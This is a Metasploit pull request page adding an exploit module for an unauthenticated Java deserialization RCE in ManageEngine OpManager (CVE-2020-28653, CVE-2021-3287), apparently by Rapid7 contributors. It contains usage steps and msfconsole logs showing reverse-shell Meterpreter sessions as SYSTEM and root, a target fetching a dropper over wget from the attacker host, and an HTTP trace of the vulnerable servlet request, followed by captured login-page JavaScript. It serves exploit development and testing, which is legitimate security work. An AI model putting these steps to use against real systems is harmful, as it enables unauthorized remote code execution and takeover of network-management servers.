Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add exploit for CVE-2020-28653 (ManageEngine OpManager RCE) #15670

Merged
merged 12 commits into from
Sep 20, 2021
Merged

Add exploit for CVE-2020-28653 (ManageEngine OpManager RCE) #15670

merged 12 commits into from
Sep 20, 2021

Conversation

zeroSteiner
Copy link
Contributor

@zeroSteiner zeroSteiner commented Sep 13, 2021
edited
Loading

This adds an exploit for CVE-2020-28653 which is an unauthenticated RCE in Manage Engine's OpManager platform. The vulnerability is a Java deserialization flaw in the Smart Update Manager. The exploit itself is pretty straightforward, 2 HTTP requests are made before the serialized Java blob is sent to the server to trigger the vulnerability. The first sets up an HTTP session by obtaining a session cookie, the second puts the established HTTP session in an exploitable state. CVE-2021-3287 is a patch bypass for CVE-2020-28653 which is also supported by this module.

Tested:

  • OpManager 12.5.232 on Ubuntu
  • OpManager-Central 12.5.328 on Windows Server 2019
  • OpManager 12.5.174 on Windows Server 2019
  • OpManager 12.3.295 on Windows Server 2019
  • OpManager 12.3.238 on Windows Server 2019
  • OpManager 12.3.204 on Windows Server 2019 (fails because the gadget chain is incompatible)
  • NetFlow 12.5.008 on Windows Server 2019

The Msf::Exploit::JavaDeserialization mixin can't be used for this exploit because the YSoSerial payload isn't available in the modified version which has the shell-specific variants. Each target was tested to ensure that the module is setting the shell and escaping the arguments as necessary.

Java Deserialization Updates

This PR makes some updates to the tooling around the YSoSerial payloads.

  • Fixed a compatibility bug with diff-lcs v1.4, allowing the tool to work with the latest gem
  • Allowed updating existing data sets (use the new --json option)
  • Removed the runme.sh script that would regenerate and overwrite all of the payloads
  • Applied Rubocop changes to the offsets tool
  • Updated the Dockerfile to accept arguments, making it more flexible
  • Switched to using an option parser and added long-form names

This will be the 13th module using either the Msf::Exploit::JavaDeserialization or Msf::Util::JavaDeserialization utility directly. The payloads that are currently used by those modules are known to work. It doesn't make sense to update all of the YSoSerial payload blobs at once anymore when changes need to be made because each payload should really be tested to ensure that the offsets are correct. The changes to the tool allows individual YSoSerial payloads to be regenerated and merged into the JSON data file. This means only modified payloads need to be tested, while the rest remain the same.

In the context of this exploit, this functionality was used to generate and add the frohoff/ysoserial#168 payload which is a derivative of CommonsBeanutils1 but has been updated per the vulnerability analysis to remove the dependency on the commons-collections lib. The name should make it future proof since AFAIK GitHub Pull Requests can't be deleted and the final name is unknown at this point since the changes have only been submitted. If the changes are merged in, the name should be updated. This allows the two PRs to proceed independently of one another, there's no need to wait for frohoff/ysoserial#168 to be merged first.

The gadget chain was generated by:

  1. Building the PR branch using the supplied Dockerfile
  2. Run the image one so it's accessible
  3. Use docker cp IMAGEID:/app/ysoserial.jar tools/payloads/ysoserial/ysoserial-original.jar copying the built ysoserial.jar file to the tools directory
  4. Run find_ysoserial_offsets.rb -p CommonsBeanutils1
  5. Merge the output by hand with data/ysoserial_payloads.json, using the new name

Verification

  • Start msfconsole
  • Do: use exploit/multi/http/opmanager_sumpdu_deserialization
  • Set the RHOSTS, TARGET, PAYLOAD and payload-related options as necessary
  • Do: run
  • You should get a shell.

Demo

msf6 > use exploit/multi/http/opmanager_sumpdu_deserialization 
[*] Using configured payload cmd/windows/powershell_reverse_tcp
msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > set RHOSTS 192.168.159.10
RHOSTS => 192.168.159.10
msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > set TARGET Windows\ PowerShell 
TARGET => Windows PowerShell
msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > set LHOST 192.168.159.128 
LHOST => 192.168.159.128
msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > check
[*] 192.168.159.10:8060 - The target appears to be vulnerable.
msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > exploit
[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] An HTTP session cookie has been issued
[*] The request handler has been associated with the HTTP session
[*] Sending stage (200262 bytes) to 192.168.159.10
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.10:50295) at 2021-09-13 16:31:45 -0400
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN-3MSP8K2LCGC
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : MSFLAB
Logged On Users : 7
Meterpreter     : x64/windows
meterpreter >

@smcintyre-r7 smcintyre-r7 added docs module rn-modules release notes for new or majorly enhanced modules labels Sep 13, 2021
adfoster-r7
adfoster-r7 reviewed Sep 14, 2021
View reviewed changes
tools/payloads/ysoserial/Dockerfile

COPY find_ysoserial_offsets.rb /

CMD ruby /find_ysoserial_offsets.rb -a
ENTRYPOINT ["ruby", "/find_ysoserial_offsets.rb"]
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Any context on this change? 🕵️

Copy link
Contributor Author

@zeroSteiner zeroSteiner Sep 14, 2021
edited
Loading

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Yeah in the "Java Deserialization Updates" section I mentioned switching the docker container and dropping runme.sh. This removes the -a flag used by runme.sh since we shouldn't be updating all payloads at once anymore and makes the script the entry point so the container can be more easily used with user specified arguments.

Admittedly once I fixed the diff-lcs 1.4 compatibility issue, I just ran the offsets tool natively on my system but I could see why some people might want to run it in docker so I kept the file and made it more flexible. Downloading specific versions of the built jars is handy to know what revision the payload data was generated with.

@adfoster-r7
Copy link
Contributor

Github tests are failing for unrelated reasons, if you rebase against master and push it up again, they should go green 👍

@zeroSteiner
Initial work on CVE-2021-3287
02fde3a
@zeroSteiner
Fix the diff-lcs v1.4+ bug
6b90582
@zeroSteiner
Update find_ysoserial_offsets
5219759 
* Apply rubocop suggestions for style
* Support patching an existing JSON file
* Use an OptionParser
@zeroSteiner
Update the YSoSerial Dockerfile and remove runme
4e28d3d 
Remove the runme script because we should no longer be updating all of
the gadget chains at once because doing so would require that quite a
few different modules be updated. Moving forward we should be updating
individual chains using an incremental approach to allow us to validate
the results of the find_ysoserial_offsets tool which is error prone.
@zeroSteiner
Add the generated YSoSerial gadget chain
d483463
@zeroSteiner
Apply rubocop changes and fix all targets
d640866
@zeroSteiner
Add and test the remaining targets
3986707
@zeroSteiner
Write up the module docs
d82ed7d
@zeroSteiner zeroSteiner changed the title Add exploit for CVE-2021-3287 (Manage Engine OpManager RCE) Add exploit for CVE-2020-28653 (Manage Engine OpManager RCE) Sep 15, 2021
@jmartin-tech
Copy link
Contributor

@msjenkins-r7 test this please.

@space-r7 space-r7 self-assigned this Sep 15, 2021
@smcintyre-r7 smcintyre-r7 changed the title Add exploit for CVE-2020-28653 (Manage Engine OpManager RCE) Add exploit for CVE-2020-28653 (ManageEngine OpManager RCE) Sep 16, 2021
smcintyre-r7
smcintyre-r7 reviewed Sep 16, 2021
View reviewed changes
data/ysoserial_payloads.json
@@ -317,6 +317,17 @@
},
"Wicket1": {
"status": "unsupported"
},
"frohoff/ysoserial#168": {
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Named to point to frohoff/ysoserial#168 so both PRs can move forward independently of each other.

@space-r7
Copy link
Contributor

Tested various versions on both Linux and Windows:

Version 12.5.328 on Ubuntu 20.04

Linux Dropper Target

msf6 > use exploit/multi/http/opmanager_sumpdu_deserialization
[*] Using configured payload cmd/windows/powershell_reverse_tcp
msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > set rhost 192.168.140.135
rhost => 192.168.140.135
msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > set lhost 192.168.140.1
lhost => 192.168.140.1
msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows Command
   1   Windows Dropper
   2   Windows PowerShell
   3   Unix Command
   4   Linux Dropper
   5   Python


msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > set target 4
target => 4
msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > run

[*] Started reverse TCP handler on 192.168.140.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[*] An HTTP session cookie has been issued
[*] Detected version: 12.5.328
[*] The request handler has been associated with the HTTP session
[*] Using URL: http://0.0.0.0:8080/fWMV6bUCRSxR3U
[*] Local IP: http://192.168.1.199:8080/fWMV6bUCRSxR3U
[*] Client 192.168.140.135 (Wget/1.20.3 (linux-gnu)) requested /fWMV6bUCRSxR3U
[*] Sending payload to 192.168.140.135 (Wget/1.20.3 (linux-gnu))
[*] Sending stage (3012548 bytes) to 192.168.140.135
[*] Command Stager progress - 134.17% done (161/120 bytes)
[*] Meterpreter session 1 opened (192.168.140.1:4444 -> 192.168.140.135:33008) at 2021-09-16 16:49:13 -0500
[*] Server stopped.

meterpreter > getuid
Server username: root @ ubuntu (uid=0, gid=0, euid=0, egid=0)
meterpreter > sysinfo
Computer     : 192.168.140.135
OS           : Ubuntu 20.04 (Linux 5.11.0-34-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

Python target

msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > run

[*] Started reverse TCP handler on 192.168.140.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[*] An HTTP session cookie has been issued
[*] Detected version: 12.5.328
[*] The request handler has been associated with the HTTP session
[*] Sending stage (39560 bytes) to 192.168.140.135
[*] Meterpreter session 2 opened (192.168.140.1:4444 -> 192.168.140.135:33048) at 2021-09-16 17:13:20 -0500

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer        : ubuntu
OS              : Linux 5.11.0-34-generic #36~20.04.1-Ubuntu SMP Fri Aug 27 08:06:32 UTC 2021
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter >
Version 12.3.238 on Ubuntu 20.04 - Failing on "Could not identify the remote version number" 
msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > run

[*] Started reverse TCP handler on 192.168.140.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[*] An HTTP session cookie has been issued
[-] Exploit aborted due to failure: unexpected-reply: Could not identify the remote version number
[*] Exploit completed, but no session was created.
Version 12.5.231 on Ubuntu 20.04

Python and Linux Targets

msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > run

[*] Started reverse TCP handler on 192.168.140.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[*] An HTTP session cookie has been issued
[*] Detected version: 12.5.231
[*] The request handler has been associated with the HTTP session
[*] Sending stage (39556 bytes) to 192.168.140.135
[*] Meterpreter session 3 opened (192.168.140.1:4444 -> 192.168.140.135:52602) at 2021-09-16 17:30:00 -0500

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer        : ubuntu
OS              : Linux 5.11.0-34-generic #36~20.04.1-Ubuntu SMP Fri Aug 27 08:06:32 UTC 2021
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.140.135 - Meterpreter session 3 closed.  Reason: Died
msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > set target 4
target => 4
msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > run

[*] Started reverse TCP handler on 192.168.140.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[*] An HTTP session cookie has been issued
[*] Detected version: 12.5.231
[*] The request handler has been associated with the HTTP session
[*] Using URL: http://0.0.0.0:8080/C6ouWVVE7yazy6S
[*] Local IP: http://192.168.1.199:8080/C6ouWVVE7yazy6S
[*] Client 192.168.140.135 (Wget/1.20.3 (linux-gnu)) requested /C6ouWVVE7yazy6S
[*] Sending payload to 192.168.140.135 (Wget/1.20.3 (linux-gnu))
[*] Sending stage (3012548 bytes) to 192.168.140.135
[*] Command Stager progress - 133.88% done (162/121 bytes)
[*] Meterpreter session 4 opened (192.168.140.1:4444 -> 192.168.140.135:52606) at 2021-09-16 17:30:18 -0500
[*] Server stopped.

meterpreter > getuid
Server username: root @ ubuntu (uid=0, gid=0, euid=0, egid=0)
meterpreter > sysinfo
Computer     : 192.168.140.135
OS           : Ubuntu 20.04 (Linux 5.11.0-34-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >
Version 12.5.328 on Windows 10 x64

Windows Command and Dropper Targets

msf6 > use exploit/multi/http/opmanager_sumpdu_deserialization
[*] Using configured payload cmd/windows/powershell_reverse_tcp
msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > set rhost 192.168.140.144
rhost => 192.168.140.144
msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > set lhost 192.168.140.1
lhost => 192.168.140.1
msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > options

Module options (exploit/multi/http/opmanager_sumpdu_deserialization):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   CVE        Automatic        yes       Vulnerability to use (Accepted: Automatic, CVE-2020-28653, CVE-2021-3287)
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.140.144  yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT      8060             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine
                                          or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       OpManager path
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Payload options (cmd/windows/powershell_reverse_tcp):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   LHOST         192.168.140.1    yes       The listen address (an interface may be specified)
   LOAD_MODULES                   no        A list of powershell modules separated by a comma to download over the web
   LPORT         4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows Command


msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > run

[*] Started reverse SSL handler on 192.168.140.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[*] An HTTP session cookie has been issued
[*] Detected version: 12.5.328
[*] The request handler has been associated with the HTTP session
[*] Powershell session session 1 opened (192.168.140.1:4444 -> 192.168.140.144:52715) at 2021-09-17 11:08:16 -0500

Windows PowerShell running as user space on DESKTOP-S81CMN3
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Program Files\ManageEngine\OpManagerCentral\bin>whoami
desktop-s81cmn3\space
PS C:\Program Files\ManageEngine\OpManagerCentral\bin> ^C
Abort session 1? [y/N]  y

[*] 192.168.140.144 - Powershell session session 1 closed.  Reason: User exit
msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows Command
   1   Windows Dropper
   2   Windows PowerShell
   3   Unix Command
   4   Linux Dropper
   5   Python

msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > set target 1
target => 1
msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > run

[*] Started reverse TCP handler on 192.168.140.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[*] An HTTP session cookie has been issued
[*] Detected version: 12.5.328
[*] The request handler has been associated with the HTTP session
[*] Command Stager progress -  17.11% done (2057/12025 bytes)
[*] Command Stager progress -  34.21% done (4114/12025 bytes)
[*] Command Stager progress -  51.32% done (6171/12025 bytes)
[*] Command Stager progress -  68.42% done (8228/12025 bytes)
[*] Command Stager progress -  84.70% done (10185/12025 bytes)
[*] Command Stager progress - 100.55% done (12091/12025 bytes)
[*] Sending stage (200262 bytes) to 192.168.140.144
[*] Meterpreter session 2 opened (192.168.140.1:4444 -> 192.168.140.144:52727) at 2021-09-17 11:09:13 -0500

meterpreter > getuid
Server username: DESKTOP-S81CMN3\space
meterpreter > sysinfo
Computer        : DESKTOP-S81CMN3
OS              : Windows 10 (10.0 Build 14393).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter >
Version 12.3.295 on Windows Server 2019 - Failing on "Could not identify the remote version number" 
msf6 > use exploit/multi/http/opmanager_sumpdu_deserialization
[*] Using configured payload cmd/windows/powershell_reverse_tcp
msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > set rhost 192.168.140.149
rhost => 192.168.140.149
msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > set lhost 192.168.140.1
lhost => 192.168.140.1
msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > set httptrace true
httptrace => true
msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > check

####################
# Request:
####################
POST /servlets/com.adventnet.tools.sum.transport.SUMHandShakeServlet HTTP/1.1
Host: 192.168.140.149:8060
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application/x-www-form-urlencoded
Content-Length: 10

??w?
####################
# Response:
####################
HTTP/1.1 200
Set-Cookie: JSESSIONID=3931AB320540EB670CA48B767BCA97F5; Path=/; HttpOnly
Content-Length: 4
Vary: Accept-Encoding
Date: Fri, 17 Sep 2021 20:40:20 GMT

??
[*] 192.168.140.149:8060 - The service is running, but could not be validated.
msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > run

[*] Started reverse SSL handler on 192.168.140.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
####################
# Request:
####################
POST /servlets/com.adventnet.tools.sum.transport.SUMHandShakeServlet HTTP/1.1
Host: 192.168.140.149:8060
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application/x-www-form-urlencoded
Content-Length: 10

??w?
####################
# Response:
####################
HTTP/1.1 200
Set-Cookie: JSESSIONID=DB82AAAF2C105D85F8BA3464F194E142; Path=/; HttpOnly
Content-Length: 4
Vary: Accept-Encoding
Date: Fri, 17 Sep 2021 20:40:30 GMT

??
[!] The service is running, but could not be validated.
####################
# Request:
####################
GET / HTTP/1.1
Host: 192.168.140.149:8060
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)


####################
# Response:
####################
HTTP/1.1 200
Cache-Control: private
Expires: Wed, 31 Dec 1969 18:00:00 CST
Set-Cookie: JSESSIONID=E3F79E8675738CB73D8F6F346C24B664; Path=/; HttpOnly
X-Frame-Options: DENY
Content-Type: text/html;charset=UTF-8
Transfer-Encoding: chunked
Vary: Accept-Encoding
Date: Fri, 17 Sep 2021 20:40:30 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">





































	<head>
	<!--[if IE]><meta http-equiv='X-UA-Compatible' content='IE=edge,chrome=1' /><![endif]-->
	<script>
		sessionStorage.clear();
		var ntlm = false;
	</script>

			<input type="hidden" id="loadCookieMethod" value="true">
	<title>
		
		
		
			ManageEngine OpManager
		
		
	</title>






<script type="text/javascript">

function GetXmlHttpObject()
{ 
    var objXMLHttp=null
    if (window.XMLHttpRequest)
    {
        objXMLHttp=new XMLHttpRequest()
        if (objXMLHttp.overrideMimeType) {
         	// set type accordingly to anticipated content type
            objXMLHttp.overrideMimeType('text/xml'); //No I18N
         }
    }
    else if (window.ActiveXObject)
    {
         try {
            objXMLHttp = new ActiveXObject("Msxml2.XMLHTTP");
         } catch (e) {
            try {
               objXMLHttp = new ActiveXObject("Microsoft.XMLHTTP");
            } catch (e) {}
        }
    }
    return objXMLHttp
}
</script>
<SCRIPT LANGUAGE="javascript" SRC="/apiclient/fluidicv2/javascript/jquery/jquery-1.9.0.min.js"></SCRIPT>


<script language="JavaScript">
function showForgotPassword()
{		$("#loginFirst").slideUp(400);
        $("#errorDiv").hide();
        $("#mailErrorDiv").hide();
        $("#forgotPassStatus").hide();
        
        document.getElementById("authenticationDiv").style.display="none";
        document.getElementById("forgotPasswordDiv").style.display="block";

        $('#authenticationDiv').css({left:'-100%',opacity:'0'});
        $('#forgotPasswordDiv').css({left:'0',opacity:'1'});
}

function returnLogin()
{
	document.getElementById("forgotPassStatus").innerHTML="";
	document.getElementById("forgotPassStatus").style.display="none";
	document.getElementById("forgotPasswordDiv").style.display="none";
    document.getElementById("authenticationDiv").style.display="block";

    $('#authenticationDiv').css({left:'0',opacity:'1'});
    $('#forgotPasswordDiv').css({left:'100%',opacity:'0'});
}

function generatePwd(mailId)
{
        if(document.loginForm.uname.value=="")
        {
                alert("Kindly provide all the details.");
                return;
        }
        else
        {
		        xmlHttp = GetXmlHttpObject();
                if(xmlHttp != null)
                {
                        xmlHttp.onreadystatechange = processStateChange;
                        //var url = "/admin/SendPassword.do?uname="+document.loginForm.uname.value+"&domainName=NULL"; //No i18n
			var url = "/servlets/ForgotPasswordServlet?uname="+document.loginForm.uname.value+"&domainName=NULL"; //No i18n
                        url= url+"&sid="+Math.random(); //No I18N
                        xmlHttp.open("POST",url,true);
                        xmlHttp.send(null);
                }
        }
}

function processStateChange()
{
        if(xmlHttp.readyState == 4 || xmlHttp.readyState == "complete")
        {
		document.getElementById("forgotPassStatus").style.display="block";
        document.getElementById("forgotPassStatus").innerHTML=xmlHttp.responseText;
        }
}

function GetXmlHttpObject()
{
        var objXmlHttp = null;
        if(window.XMLHttpRequest)
        {
                objXmlHttp = new XMLHttpRequest();
        }
        else if(window.ActiveXObject)
        {
                objXmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
        }
        return objXmlHttp;
}

var uName = "";
var autoSigin = "";
var pwd = "";
var dName = "";
var encyptedpwd = "";
var authrule_name = "";

function setincheckbox()
{
 var url = "/servlets/SettingsServlet?"; //No I18N
        var dataParams = "readAutoLoginCookie=true";//No I18N
        if(window.location.pathname === "/apiclient/ember/index.jsp" && window.location.hash.indexOf('#/') !== -1){
            dataParams=dataParams+"&cookieUpdate=true&cookieName=f2RedirectUrl&cookieValue="+window.location.href+"&cookieExpiry=-1";//No I18N
        }else{
            dataParams=dataParams+"&eraseCookie=true&cookieName=f2RedirectUrl";//No I18N
        }
        $.ajax({
            url: url,
            type: "POST",//No I18N
            dataType: 'json',//No I18N
            async: false,
            data:dataParams,
            success: function(jsonData)
            {
                uName = jsonData.userNameForAutomaticSignin;
                autoSigin = jsonData.signInAutomatically;
                pwd = jsonData.password;
                dName = jsonData.domainNameForAutomaticSignin;
                encyptedpwd=jsonData.encryptPassForAutomaticSignin;
                authrule_name=jsonData.authrule_name;
            }
        });
    if(autoSigin == "false")
    {
    jQuery("#StayIn").removeAttr('checked'); //no i18n
    }
    else
    {
    jQuery("#StayIn").attr('checked',"true"); //no i18n
    }
}

function loadCredentialsFromCookie()
{
    setScreenSize();
       
    var loadCookie = document.getElementById("loadCookieMethod").value;
	if(autoSigin=="true" && (uName!==undefined && uName!=null && uName!="") && (loadCookie!==undefined && loadCookie!=null && loadCookie=="true"))
	{
		var errorExist = "false";

		if(document.getElementById("errorMsg") !== undefined && document.getElementById("errorMsg") !== null)
		{
			errorExist = document.getElementById("errorMsg").innerHTML;
		}
	
         	if(errorExist==="false")
        	{
			signOn(uName,encyptedpwd,dName,authrule_name);
		}
		else
		{
			var e = document.getElementById("LoginDiv").style;
                        e.display = "block";
                        if ( uName!=null )
                        {
                                document.loginForm.userName.value = uName;
                        }
                        if ( pwd!=null )
                        {
                            document.loginForm.password.value =  pwd;
                        }
                        document.loginForm.userName.focus();
		}
	}
	else
	{
		var e = document.getElementById("LoginDiv").style;
		e.display = "block";
		if ( uName!=null )
		{
			document.loginForm.userName.value = uName;
        } 

		if ( pwd!=null )
		{
			document.loginForm.password.value =  pwd; 
		}
         else
        {
           document.getElementById('password').setAttribute("class","loginFont pwdField opacity3");
        }
		document.loginForm.userName.focus();
	}
}

function signOn(uName,pwd,dName,authrule_name)
{
		document.loginForm.loginFromCookieData.value = true;
		document.loginForm.userName.value = uName;	
        document.loginForm.password.value = pwd; 
		document.loginForm.AUTHRULE_NAME.value=authrule_name;
		if(authrule_name=="ADAuthenticator")
		{
            $('#domainNameDiv').attr({
                name:'domainName', //No I18N
                value:dName
            });
			if(document.loginForm.domainNameAD !== undefined && document.loginForm.domainNameAD !== null)
			{
				document.loginForm.domainNameAD.value=dName;
			}
		}
		else if(authrule_name=="RadiusAuthenticator")
		{
			$('#domainNameDiv').removeAttr('name value'); //No I18N
			if(document.loginForm.domainNameAD !== undefined && document.loginForm.domainNameAD !== null)
			{
				document.loginForm.domainNameAD.value="radiusUserLogin"; //No I18N
			}
		}
		else
		{
			$('#domainNameDiv').removeAttr('name value'); //No I18N
			if(document.loginForm.domainNameAD !== undefined && document.loginForm.domainNameAD !== null)
			{
				document.loginForm.domainNameAD.value="Authenticator"; //No I18N
			}
		}	
        document.loginForm.submit();
}

// function userType()
// {
//     var id = document.getElementById("loginFirst");
//     if (false)
//     {
//         //alert('Showing the userDetails');
//         eval("id.style.visibility = 'visible';");
//     }
//     else
//     {
//         eval("id.style.visibility = 'hidden';");
//     }
// }


var xmlHttp

// function clearLoginInfo()
// {
//     xmlHttp=GetXmlHttpObject()
//     if (xmlHttp==null)
//     {
//         alert ("Browser does not support HTTP Request"); //No I18N
//         return
//     }
//     var url="/showDetails.do?requestid=false"; //No I18N
//     url=url+"&sid="+Math.random();//No I18N
//     xmlHttp.onreadystatechange=processReqChange
//     xmlHttp.open("GET",url,true)
//     xmlHttp.send(null)
// }

// function processReqChange()
// {
//     // only if xmlHttp shows "complete"
//     if (xmlHttp.readyState == 4)
//     {
//         // only if "OK"
//         if (xmlHttp.status == 200)
//         {
//             // ...processing statements go here...
//             response  = xmlHttp.responseXML.documentElement;
//             result    = response.getElementsByTagName('result')[0].firstChild.data;
//             //result = unescape(result);
//             var id = document.getElementById("loginFirst");
//             if(result) {
//                 //document.getElementById("loginFirst").visibility = 'visible';
//                 eval("id.style.visibility = 'hidden';");
//             }
//             else
//             {
//                 eval("id.style.visibility = 'visible';");
//             }
//         }
//         else
//         {
//     	    alert("There was a problem retrieving the XML data:\n" + xmlHttp.statusText); //No I18N
//         }
//     }
//     //alert("Status Text:\n" + xmlHttp.statusText);
// }

function GetXmlHttpObject()
{
    var objXMLHttp=null
    if (window.XMLHttpRequest)
    {
        objXMLHttp=new XMLHttpRequest()
    }
    else if (window.ActiveXObject)
    {
        objXMLHttp=new ActiveXObject("Microsoft.XMLHTTP")
    }
    return objXMLHttp
}


function loginSubmit()
{
	if(document.getElementById("authenticationDiv").style.display=='block')
	{
	    if(validateUser()) {
        	//document.loginForm.submit();
		return true;
	    }
		else
		{
			return false;
		}
	}
	else
	{
		generatePwd();
	}
}

function checkLogin(e)
{
   var characterCode;
      if(e && e.which){
       e = e
       characterCode = e.which
   }
   else{
       e = event
       characterCode = e.keyCode
   }
         if(characterCode == 13)
       loginSubmit();
}


function validateUser()
{
	if(document.getElementById("authenticationDiv").style.display=='block')
	{
		document.loginForm.loginFromCookieData.value = false;	
	    var userName = trimAll(document.loginForm.userName.value);
        var password = trimAll(document.loginForm.password.value);
        if(userName == "")
        {
                alert("Please enter the User Name");
                document.loginForm.userName.focus();
                return false;
        }
        if(password == "")
        {
                alert("Please enter the password");
                document.loginForm.password.focus();
                return false;
        }
       	var defaultDomainValue="Authenticator";//no i18n
		if(document.loginForm.domainNameAD !== undefined && document.loginForm.domainNameAD.value !== null)
		{
			defaultDomainValue=document.loginForm.domainNameAD.value;
		}
		
		if(defaultDomainValue=='NULL')
		{
			defaultDomainValue="Authenticator";//no i18n
		}
		if(userName=='trialuserlogin')
		{
			defaultDomainValue="Authenticator";//no i18n
		}
		if(  document.loginForm.signInAutomatically.checked != null && document.loginForm.signInAutomatically.checked === true)
        	{
			var url = "/servlets/SettingsServlet?requestType=AJAX&sid="+Math.random(); //No I18N
            var dataParams = "EncryptPassword="+password+"&userName="+userName+"&domainName="+defaultDomainValue+"&autoSignIn="+document.loginForm.signInAutomatically.checked+"&authRuleName="+document.loginForm.AUTHRULE_NAME.value;//No I18N

                $.ajax({
                    url: url,
                    type: "POST",//No I18N
                    dataType: "html",//No I18N
                    async: false,
                    data:dataParams
                 });
            }
            else
            {
                var url = "/servlets/SettingsServlet?requestType=AJAX&sid="+Math.random(); //No I18N
                var dataParams ="eraseAutoLoginCookie=true&cookieUpdate=true&cookieName=signInAutomatically&cookieValue=false&cookieExpiry=30";//No I18N

                $.ajax({
                    url: url,
                    type: "POST",//No I18N
                    dataType: "html",//No I18N
                    async: false,
                    data:dataParams
                 });
            }
            return true;
	}
	else
	{
		generatePwd();
	}

}


function setScreenSize() {
//getFlashVersion();

    var screenWidth = 0, screenHeight = 0;
    if( typeof( window.innerWidth ) == 'number' ) {
        //Non-IE
        screenWidth = window.innerWidth;
        screenHeight = window.innerHeight;
    }
    else if(document.documentElement && (document.documentElement.clientWidth || document.documentElement.clientHeight))
   {
        //IE 6+ in 'standards compliant mode'
        screenWidth = document.documentElement.clientWidth;
        screenHeight = document.documentElement.clientHeight;
    }
    else if( document.body && ( document.body.clientWidth || document.body.clientHeight ) ) {
        //IE 4 compatible
        screenWidth = document.body.clientWidth;
        screenHeight = document.body.clientHeight;
    }
